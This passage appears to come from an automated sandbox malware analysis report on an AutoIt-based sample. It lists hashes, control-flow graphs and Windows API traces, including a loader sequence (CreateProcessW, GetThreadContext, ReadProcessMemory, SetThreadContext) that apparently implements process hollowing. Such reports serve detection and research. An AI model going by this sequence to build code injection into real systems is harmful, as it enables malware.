                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                  • String ID: TaskbarCreated
                                                                  • API String ID: 129472671-2362178303
                                                                  • Opcode ID: be0dd4b8077f77357cc952e6c4f5cc2e00b3900659fd68e6f8ab70de90b71c46
                                                                  • Instruction ID: 7120cd7304264ee600d7d6258dae159911c71b6aa00df32169108e2afba121ee
                                                                  • Opcode Fuzzy Hash: be0dd4b8077f77357cc952e6c4f5cc2e00b3900659fd68e6f8ab70de90b71c46
                                                                  • Instruction Fuzzy Hash: 9D412BB122838EABEF156F25EC09BFA3695F741304F141526F502B92F2CF65AC50BB61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F20C5B
                                                                    • Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B
                                                                  • _memset.LIBCMT ref: 00EE5787
                                                                  • _wcscpy.LIBCMT ref: 00EE57DB
                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EE57EB
                                                                  • __swprintf.LIBCMT ref: 00F20CD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                  • String ID: Line %d: $AutoIt -
                                                                  • API String ID: 230667853-4094128768
                                                                  • Opcode ID: ef14e6309705e9d30f0e6ec7b1d3cfc5dc0a06ad5c50d5cb85bcbdb608e981cd
                                                                  • Instruction ID: d33b1123dc0985179a196f40b61bc4f2a05ad05ab2e29e44141cea98098f59e9
                                                                  • Opcode Fuzzy Hash: ef14e6309705e9d30f0e6ec7b1d3cfc5dc0a06ad5c50d5cb85bcbdb608e981cd
                                                                  • Instruction Fuzzy Hash: BF41C472418348AAC325FB61DC45ADF77DCAF84364F100A1EF185A21A2EF74A648DB97
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1138 3af156b-3af163e call 3af0005 call 3af00e4 * 7 call 3af0019 CreateFileW 1157 3af1644-3af164f 1138->1157 1158 3af1720 1138->1158 1161 3af171c-3af171e 1157->1161 1162 3af1655-3af1665 VirtualAlloc 1157->1162 1160 3af1724-3af172c 1158->1160 1165 3af1746-3af174a 1160->1165 1161->1158 1161->1160 1162->1161 1163 3af166b-3af167a ReadFile 1162->1163 1163->1161 1166 3af1680-3af16a1 VirtualAlloc 1163->1166 1167 3af172e-3af1733 1165->1167 1168 3af174c-3af1751 1165->1168 1169 3af1719 1166->1169 1170 3af16a3-3af16b6 call 3af00b5 1166->1170 1171 3af173c-3af173e 1167->1171 1172 3af1735-3af173a 1167->1172 1173 3af175e-3af1764 1168->1173 1174 3af1753-3af175b VirtualFree 1168->1174 1169->1161 1179 3af16ef-3af16ff call 3af00e4 1170->1179 1180 3af16b8-3af16c1 1170->1180 1176 3af1744 1171->1176 1177 3af1740-3af1742 1171->1177 1172->1165 1174->1173 1176->1165 1177->1165 1179->1169 1186 3af1701-3af1706 1179->1186 1181 3af16c4-3af16ed call 3af00b5 1180->1181 1181->1179 1187 3af170c-3af1717 VirtualFree 1186->1187 1188 3af1708-3af1709 FindCloseChangeNotification 1186->1188 1187->1165 1188->1187
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,00000000,7F91A078,00000000,7F951704,00000000,7FE1F1FB,00000000,7FE7F840,00000000), ref: 03AF1634
                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,03AF1783,7FAB7E30,03AF1052,00000000,00000040), ref: 03AF165E
                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,7FAB7E30,00000000,?,?,?,?,?,?,?,03AF1783,7FAB7E30,03AF1052,00000000), ref: 03AF1675
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,03AF1783,7FAB7E30,03AF1052,00000000,00000040), ref: 03AF1699
                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,03AF0C47,00000000,?,?,?,?,?,?,?,03AF1783,7FAB7E30,03AF1052,00000000,00000040,?), ref: 03AF1709
                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,03AF0C47,00000000,?,?,?,?,?,?,?,03AF1783,7FAB7E30,03AF1052,00000000), ref: 03AF1714
                                                                  • VirtualFree.KERNELBASE(03AF0C47,00000000,00008000,?,?,?,?,?,?,?,03AF1783,7FAB7E30,03AF1052,00000000,00000040,?), ref: 03AF175B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.256622891.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_3af0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                  • String ID:
                                                                  • API String ID: 656311269-0
                                                                  • Opcode ID: 8f45008f768d33d7bd127eaa78f521bf14de2d86f53a47dd627cbe435d6bc0e6
                                                                  • Instruction ID: a7dd3151770462d58584927d738558fe83d8f31745dcde8264f882ef16d0d1ae
                                                                  • Opcode Fuzzy Hash: 8f45008f768d33d7bd127eaa78f521bf14de2d86f53a47dd627cbe435d6bc0e6
                                                                  • Instruction Fuzzy Hash: 99518975E00319EFDB20DBE49D84BAEFBB8AF09714F14455AFA04FB281E77499018B64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1189 ee50db-ee514b CreateWindowExW * 2 ShowWindow * 2
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateShow
                                                                  • String ID: AutoIt v3$edit
                                                                  • API String ID: 1584632944-3779509399
                                                                  • Opcode ID: 590b910d6493417af416396cc4f838d220e83eee83e252937439e7d32a026ef3
                                                                  • Instruction ID: 0ced58064dabbf37ad5bf6d340b5b225f635bd0a1f990326555077c00feef68d
                                                                  • Opcode Fuzzy Hash: 590b910d6493417af416396cc4f838d220e83eee83e252937439e7d32a026ef3
                                                                  • Instruction Fuzzy Hash: 00F0DA715653987EEB712727AC48E273E7DD7C7F50F10011AB900A21B1CAA51851EEB4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1190 3af09cb-3af09de 1191 3af09e1-3af09e5 1190->1191 1192 3af09fd-3af0a0a 1191->1192 1193 3af09e7-3af09fb 1191->1193 1194 3af0a0d-3af0a11 1192->1194 1193->1191 1195 3af0a29-3af0a36 1194->1195 1196 3af0a13-3af0a27 1194->1196 1197 3af0a39-3af0a3d 1195->1197 1196->1194 1198 3af0a3f-3af0a53 1197->1198 1199 3af0a55-3af0b3b call 3af0005 call 3af00e4 * 8 1197->1199 1198->1197 1218 3af0b3d-3af0b47 1199->1218 1219 3af0b52 1199->1219 1218->1219 1220 3af0b49-3af0b50 1218->1220 1221 3af0b56-3af0b72 1219->1221 1220->1221 1223 3af0b7b 1221->1223 1224 3af0b74-3af0b76 1221->1224 1226 3af0b82-3af0bac CreateProcessW 1223->1226 1225 3af0efa-3af0efb 1224->1225 1228 3af0bae 1226->1228 1229 3af0bb3-3af0bcf GetThreadContext 1226->1229 1230 3af0eae-3af0eb2 1228->1230 1231 3af0bd6-3af0bf3 ReadProcessMemory 1229->1231 1232 3af0bd1 1229->1232 1235 3af0ef7-3af0ef9 1230->1235 1236 3af0eb4-3af0eb8 1230->1236 1233 3af0bfa-3af0c03 1231->1233 1234 3af0bf5 1231->1234 1232->1230 1237 3af0c2a-3af0c49 call 3af0f44 1233->1237 1238 3af0c05-3af0c14 1233->1238 1234->1230 1235->1225 1239 3af0ecb-3af0ecf 1236->1239 1240 3af0eba-3af0ec5 1236->1240 1253 3af0c4b 1237->1253 1254 3af0c50-3af0c71 call 3af105c 1237->1254 1238->1237 1241 3af0c16-3af0c23 call 3af12a3 1238->1241 1243 3af0ed7-3af0edb 1239->1243 1244 3af0ed1 1239->1244 1240->1239 1241->1237 1256 3af0c25 1241->1256 1248 3af0edd 1243->1248 1249 3af0ee3-3af0ee7 1243->1249 1244->1243 1248->1249 1250 3af0ee9-3af0eee call 3af12a3 1249->1250 1251 3af0ef3-3af0ef5 1249->1251 1250->1251 1251->1225 1253->1230 1259 3af0cb6-3af0cd6 call 3af105c 1254->1259 1260 3af0c73-3af0c7a 1254->1260 1256->1230 1267 3af0cdd-3af0cf2 call 3af00b5 1259->1267 1268 3af0cd8 1259->1268 1261 3af0c7c-3af0ca8 call 3af105c 1260->1261 1262 3af0cb1 1260->1262 1269 3af0caf 1261->1269 1270 3af0caa 1261->1270 1262->1230 1273 3af0cfb-3af0d05 1267->1273 1268->1230 1269->1259 1270->1230 1274 3af0d37-3af0d3b 1273->1274 1275 3af0d07-3af0d35 call 3af00b5 1273->1275 1277 3af0e1b-3af0e37 call 3af1336 1274->1277 1278 3af0d41-3af0d4f 1274->1278 1275->1273 1285 3af0e3b-3af0e5c SetThreadContext 1277->1285 1286 3af0e39 1277->1286 1278->1277 1280 3af0d55-3af0d63 1278->1280 1280->1277 1284 3af0d69-3af0d89 1280->1284 1287 3af0d8c-3af0d90 1284->1287 1288 3af0e5e 1285->1288 1289 3af0e60-3af0e6a call 3af11f4 1285->1289 1286->1230 1287->1277 1290 3af0d96-3af0dab 1287->1290 1288->1230 1296 3af0e6e-3af0e72 1289->1296 1297 3af0e6c 1289->1297 1292 3af0dbd-3af0dc1 1290->1292 1294 3af0dfe-3af0e16 1292->1294 1295 3af0dc3-3af0dcf 1292->1295 1294->1287 1298 3af0dfc 1295->1298 1299 3af0dd1-3af0dfa 1295->1299 1300 3af0e7a-3af0e7e 1296->1300 1301 3af0e74 1296->1301 1297->1230 1298->1292 1299->1298 1303 3af0e86-3af0e8a 1300->1303 1304 3af0e80 1300->1304 1301->1300 1305 3af0e8c 1303->1305 1306 3af0e92-3af0e96 1303->1306 1304->1303 1305->1306 1307 3af0e98-3af0e9d call 3af12a3 1306->1307 1308 3af0ea2-3af0ea8 1306->1308 1307->1308 1308->1226 1308->1230
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 03AF0BA7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.256622891.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_3af0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID: D
                                                                  • API String ID: 963392458-2746444292
                                                                  • Opcode ID: e1a5388ddbcfa06036bf0c0d56e2bfa4bfb3376804a9db030e461f196f90f276
                                                                  • Instruction ID: adc379f780fa815dc75ed046ce6c4a938523916952922e82573d42b22ba5b168
                                                                  • Opcode Fuzzy Hash: e1a5388ddbcfa06036bf0c0d56e2bfa4bfb3376804a9db030e461f196f90f276
                                                                  • Instruction Fuzzy Hash: B702C270D00209EFDB14DFD4C985BADBBB5BF08305F2441AAF655BA292D7749A85CF10
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1310 ef563d-ef5656 1311 ef5658-ef565d 1310->1311 1312 ef5673 1310->1312 1311->1312 1313 ef565f-ef5661 1311->1313 1314 ef5675-ef567b 1312->1314 1315 ef567c-ef5681 1313->1315 1316 ef5663-ef5668 call ef8d58 1313->1316 1317 ef568f-ef5693 1315->1317 1318 ef5683-ef568d 1315->1318 1328 ef566e call ef8fe6 1316->1328 1321 ef5695-ef56a0 call ef3010 1317->1321 1322 ef56a3-ef56a5 1317->1322 1318->1317 1320 ef56b3-ef56c2 1318->1320 1326 ef56c9 1320->1326 1327 ef56c4-ef56c7 1320->1327 1321->1322 1322->1316 1325 ef56a7-ef56b1 1322->1325 1325->1316 1325->1320 1330 ef56ce-ef56d3 1326->1330 1327->1330 1328->1312 1332 ef57bc-ef57bf 1330->1332 1333 ef56d9-ef56e0 1330->1333 1332->1314 1334 ef56e2-ef56ea 1333->1334 1335 ef5721-ef5723 1333->1335 1334->1335 1338 ef56ec 1334->1338 1336 ef578d-ef5797 call f00dd7 1335->1336 1337 ef5725-ef5727 1335->1337 1344 ef57ee-ef57f7 1336->1344 1354 ef5799-ef579e 1336->1354 1340 ef574b-ef5756 1337->1340 1341 ef5729-ef5731 1337->1341 1342 ef57ea 1338->1342 1343 ef56f2-ef56f4 1338->1343 1348 ef575a-ef575d 1340->1348 1349 ef5758 1340->1349 1346 ef5733-ef573f 1341->1346 1347 ef5741-ef5745 1341->1347 1342->1344 1350 ef56fb-ef5700 1343->1350 1351 ef56f6-ef56f8 1343->1351 1344->1314 1355 ef5747-ef5749 1346->1355 1347->1355 1353 ef57c4-ef57c8 1348->1353 1356 ef575f-ef576b call ef4906 call f0108b 1348->1356 1349->1348 1352 ef5706-ef571f call f00ef8 1350->1352 1350->1353 1351->1350 1369 ef5782-ef578b 1352->1369 1359 ef57da-ef57e5 call ef8d58 1353->1359 1360 ef57ca-ef57d7 call ef3010 1353->1360 1354->1353 1358 ef57a0-ef57b1 1354->1358 1355->1348 1371 ef5770-ef5775 1356->1371 1364 ef57b4-ef57b6 1358->1364 1359->1328 1360->1359 1364->1332 1364->1333 1369->1364 1372 ef57fc-ef5800 1371->1372 1373 ef577b-ef577e 1371->1373 1372->1344 1373->1342 1374 ef5780 1373->1374 1374->1369
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                  • String ID:
                                                                  • API String ID: 1559183368-0
                                                                  • Opcode ID: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
                                                                  • Instruction ID: b8bf74a15f053feb7208fb1225c77308c218331c3affb4b1d68e929de8d80970
                                                                  • Opcode Fuzzy Hash: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
                                                                  • Instruction Fuzzy Hash: 8251E832A00B0DDBCB249F69C8846BE77A5AF20324F24976AFB35F62D0D7709D509B40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1375 ed1284-ed128f 1376 ed1291-ed1296 1375->1376 1377 ed1303-ed1305 1375->1377 1376->1377 1379 ed1298-ed12b0 RegOpenKeyExW 1376->1379 1378 ed12f4-ed12f9 1377->1378 1379->1377 1380 ed12b2-ed12d1 RegQueryValueExW 1379->1380 1381 ed12e8-ed12f3 RegCloseKey 1380->1381 1382 ed12d3-ed12de 1380->1382 1381->1378 1383 ed12fa-ed1301 1382->1383 1384 ed12e0-ed12e2 1382->1384 1385 ed12e6 1383->1385 1384->1385 1385->1381
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00ED1275,SwapMouseButtons,00000004,?), ref: 00ED12A8
                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00ED1275,SwapMouseButtons,00000004,?), ref: 00ED12C9
                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00ED1275,SwapMouseButtons,00000004,?), ref: 00ED12EB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: Control Panel\Mouse
                                                                  • API String ID: 3677997916-824357125
                                                                  • Opcode ID: 66bccf081968673a56fb1d795343fa506af0f481d74e5c1dc89f361c17e6cd8b
                                                                  • Instruction ID: 7b94c6e87e85f830b0b05bcb6a79314470817e5b9b0991179b3c2d66aefc6316
                                                                  • Opcode Fuzzy Hash: 66bccf081968673a56fb1d795343fa506af0f481d74e5c1dc89f361c17e6cd8b
                                                                  • Instruction Fuzzy Hash: 3A115A71614208BFDB208FA5DC84EEFBBB8EF05744F1055AAF805E7220D6729E41A7A0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE49C2: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00EE27AF,?,00000001), ref: 00EE49F4
                                                                  • _free.LIBCMT ref: 00F1FB04
                                                                  • _free.LIBCMT ref: 00F1FB4B
                                                                    • Part of subcall function 00EE29BE: SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00EE2ADF
                                                                  Strings
                                                                  • Bad directive syntax error, xrefs: 00F1FB33
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                                  • String ID: Bad directive syntax error
                                                                  • API String ID: 2861923089-2118420937
                                                                  • Opcode ID: b2e28e9364ab161caa8eb0f336c91aba771c416a6c0165320a6b0f2fe70a4836
                                                                  • Instruction ID: 57a57411e9c4e312f6a4b4952ed7adbc793fa67b38294403ac1b2ca5303745c2
                                                                  • Opcode Fuzzy Hash: b2e28e9364ab161caa8eb0f336c91aba771c416a6c0165320a6b0f2fe70a4836
                                                                  • Instruction Fuzzy Hash: 00919E7191025DAFCF04EFA5CC919EEB7B4BF04320F10456AF816BB2A1EB349A48DB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00F2032B
                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00F20375
                                                                    • Part of subcall function 00EF0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE2A58,?,00008000), ref: 00EF02A4
                                                                    • Part of subcall function 00EF09C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EF09E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                  • String ID: X
                                                                  • API String ID: 3777226403-3081909835
                                                                  • Opcode ID: dda8ff0df831446307ecfe61c81a3dd46999bb3b55b9904d5341864bf0e7652e
                                                                  • Instruction ID: 8bc198274ff6317f346eed78669125c7ef3db511c8a28516ea1a4658499a647c
                                                                  • Opcode Fuzzy Hash: dda8ff0df831446307ecfe61c81a3dd46999bb3b55b9904d5341864bf0e7652e
                                                                  • Instruction Fuzzy Hash: 60218171A1029C9BDB41EFA5D845BEE7BF8AF49310F00405AE504B7242DBB55A88EFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 68dd16b105e4fe686ce51f55fb066a93e85395e696f16666b03c920de9704b70
                                                                  • Instruction ID: 5fba86f62fa1a4278673efcc12a34a7545565ff5f357cae993590e2643978615
                                                                  • Opcode Fuzzy Hash: 68dd16b105e4fe686ce51f55fb066a93e85395e696f16666b03c920de9704b70
                                                                  • Instruction Fuzzy Hash: A3F14CB1A083019FC714DF28C884A6ABBE5FF89314F14892EF8999B351D775E945CF82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memmove.LIBCMT ref: 00EE39C3
                                                                  • ReadFile.KERNELBASE(00000000,?,00010000,00F60980,00000000,00000000,00000000,00000001,00EE3AAF,00008000,00F60980,?,00008000), ref: 00EE39E9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead_memmove
                                                                  • String ID:
                                                                  • API String ID: 1325644223-0
                                                                  • Opcode ID: bcc0f53f523e529fb680e2362dfcc9a86627c37d8e68e62ffcfd8d50d340fec5
                                                                  • Instruction ID: 15d15f7fcabfe6f250fd210f8b2f046aa8f44355248bd7d02eb121a5daba4edd
                                                                  • Opcode Fuzzy Hash: bcc0f53f523e529fb680e2362dfcc9a86627c37d8e68e62ffcfd8d50d340fec5
                                                                  • Instruction Fuzzy Hash: FB81E071A0425DEBDF00DF66D8887ADFBB0FF40300F148195E865AB28AD776DA60DB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EDAD08
                                                                  • OleInitialize.OLE32(00000000), ref: 00EDAD85
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleInitialize
                                                                  • String ID:
                                                                  • API String ID: 3139323997-0
                                                                  • Opcode ID: 7d3aeb23a4eda4cfb8e2f1248bf5eef240c5f7f90168a2f127f3fcb5cd521906
                                                                  • Instruction ID: f45d407dc574d964d9b7b17754fc34b55f82aac19913bbff1ee6c2b7281e9a19
                                                                  • Opcode Fuzzy Hash: 7d3aeb23a4eda4cfb8e2f1248bf5eef240c5f7f90168a2f127f3fcb5cd521906
                                                                  • Instruction Fuzzy Hash: 3C5196B082D389CEC799FF6EAD446597FE9EB58314714816BD018C72B2EB301405AF56
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00EE59F9
                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EE5A9E
                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EE5ABB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
